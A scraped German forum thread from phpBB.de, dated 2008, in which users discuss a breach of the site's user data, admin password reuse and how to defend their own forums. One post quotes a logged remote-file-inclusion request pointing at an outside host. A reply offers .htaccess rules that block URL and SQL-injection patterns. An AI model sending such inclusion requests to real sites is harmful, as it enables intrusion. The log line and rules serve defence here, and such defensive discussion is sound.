Verfasst: 05.02.2008 20:41
Es wird immer einen geben, der eine sicherheitslücke kennt und schlauer ist, also halt mal die Luft anpsprofi hat geschrieben:Na super -.-
Danke auch. -.-
Können nichmal auf die Daten der User aufpassen.
phpBB.de
phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/
Diskussion zu Benutzerdaten auf phpBB.de ausspioniert
Seite 35 von 57
Verfasst: 05.02.2008 20:44
nicht schlecht...windows will teuer bezahlt werden und hat ständig neue sicherheitslücken...das stört niemanden.....sehr merkwürdig....UND wie gesagt, es geschah auf mehreren Servern, die unabhängig konfiguriert und administriert werden...das ding war, wie ich schonmal schrieb, gut geplant und organisiert...da hätte kaum einer ne chance gehabt, nicht mal DUpsprofi hat geschrieben:Können nichmal auf die Daten der User aufpassen.
Verfasst: 05.02.2008 21:09
Besser als phpBB.de kann man es nicht machen einfach ehrliche Info dazu auch wenn wir alle hoffen das sie daraus etwas gelernt haben wie es dazu kam.
Vergleicht man Woltlab wo steht.
Vergleicht man Woltlab wo steht.
Welche Leute dort arbeiten den das ein Admin 2x das gleiche Password auch in einem anderen Forum benutzt könnte man schon fast vergleichen als fahrlässig.Soweit wir das bisher recherchieren konnten, kannte der Hacker das Passwort eines Administrators und konnte sich so Zugang zur Administrationsoberfläche verschaffen.
Verfasst: 05.02.2008 21:13
Danke an die Admins über die rasche Info. Hab gleich mal das Passwort geändert.
Verfasst: 05.02.2008 21:16
Bei dér Gelegenheit ...
habe weniger Bedenken wegen des Adressdiebstahls, der ja (vom SPAM abgesehen) nur dann negativ wirkt, wenn ich selbst die Sicherheitsvorkehrungen nicht beachtet habe (unterschiedliche Passwörter ...),
als vielmehr vor einer Staatsbürokratie, die "legal" über Trojaner Daten sammelt (noch bevor ich sie abgeschickt habe) und der ich überhaupt nicht zutraue, ausreichend sensibel mit diesen (und anderen gesamnmelten Daten) umzugehen (siehe England aber auch bereits in den 80ern hier in der BRD).
Hoffe, das die Leute, die sich hier beschweren, bei der nächsten Bundestagswahl (oder demnächst in HH) ebenfalls so konsequent ihren Unmut darüber bekunden und eher die Partei wählen, die nicht in dem Verdacht steht, Teil einer neoliberalen Wirtschafts- und Sicherheitsstrategie zu sein.
Abgesehen davon: Von einem kostenlosen Forum erwarte ich erst einmal keinen besonderen (Sicherheits-)Service. Wenn wir alle 1 Euro spenden würden könnte sich der Forumsbetreiber sicherlich einen besseren und sicheren Server leisten, auf dem keine anderen Programme laufen müssten (was ja wohl eines der Probleme bei diesem Hack war).
habe weniger Bedenken wegen des Adressdiebstahls, der ja (vom SPAM abgesehen) nur dann negativ wirkt, wenn ich selbst die Sicherheitsvorkehrungen nicht beachtet habe (unterschiedliche Passwörter ...),
als vielmehr vor einer Staatsbürokratie, die "legal" über Trojaner Daten sammelt (noch bevor ich sie abgeschickt habe) und der ich überhaupt nicht zutraue, ausreichend sensibel mit diesen (und anderen gesamnmelten Daten) umzugehen (siehe England aber auch bereits in den 80ern hier in der BRD).
Hoffe, das die Leute, die sich hier beschweren, bei der nächsten Bundestagswahl (oder demnächst in HH) ebenfalls so konsequent ihren Unmut darüber bekunden und eher die Partei wählen, die nicht in dem Verdacht steht, Teil einer neoliberalen Wirtschafts- und Sicherheitsstrategie zu sein.
Abgesehen davon: Von einem kostenlosen Forum erwarte ich erst einmal keinen besonderen (Sicherheits-)Service. Wenn wir alle 1 Euro spenden würden könnte sich der Forumsbetreiber sicherlich einen besseren und sicheren Server leisten, auf dem keine anderen Programme laufen müssten (was ja wohl eines der Probleme bei diesem Hack war).
Verfasst: 05.02.2008 21:19
So ich habe mal die Logfiles von 1! Tag durchgeschaut und insgesamt 16 IPs mit Anfragen wie diesen hier gefunden:
S.
Wie kann man sich dagegen schützen?!? Von Hand zu durchsuchen ist wohl kein geeignetes Mittel...GET /index.php?&s=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F HTTP/1.0" 200 9381
S.
Verfasst: 05.02.2008 21:44
Du könntest in die .htaccess folgendes setzen:damit werden "Besucher" die Dateien oder andere Addressen einbinden wollen nach Hause überwiesen... (Der Tipp stammt, soweit ich weiß von [BTK]Tobi )
Code: Alles auswählen
RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} (.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} (.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*)
RewriteRule (.*) http://127.0.0.1 [L,R=301]Verfasst: 05.02.2008 21:48
Schaut euch das mal hier an:
http://forum-4-all.de/thread.php?postid ... post136796
Der Hacker hat anscheinend nicht nur hier sondern auch bei WoltLab zugeschlagen.
http://forum-4-all.de/thread.php?postid ... post136796
Der Hacker hat anscheinend nicht nur hier sondern auch bei WoltLab zugeschlagen.
Verfasst: 05.02.2008 21:49
sach an? echt? *schockiert is*TobiTaba hat geschrieben:Schaut euch das mal hier an:
http://forum-4-all.de/thread.php?postid ... post136796
Der Hacker hat anscheinend nicht nur hier sondern auch bei WoltLab zugeschlagen.
Verfasst: 05.02.2008 21:53
Huhu!
Blöde Frage, wo finde ich die Log-Files meines Forums?
Lieben Gruß,
Anke
Blöde Frage, wo finde ich die Log-Files meines Forums?
Lieben Gruß,
Anke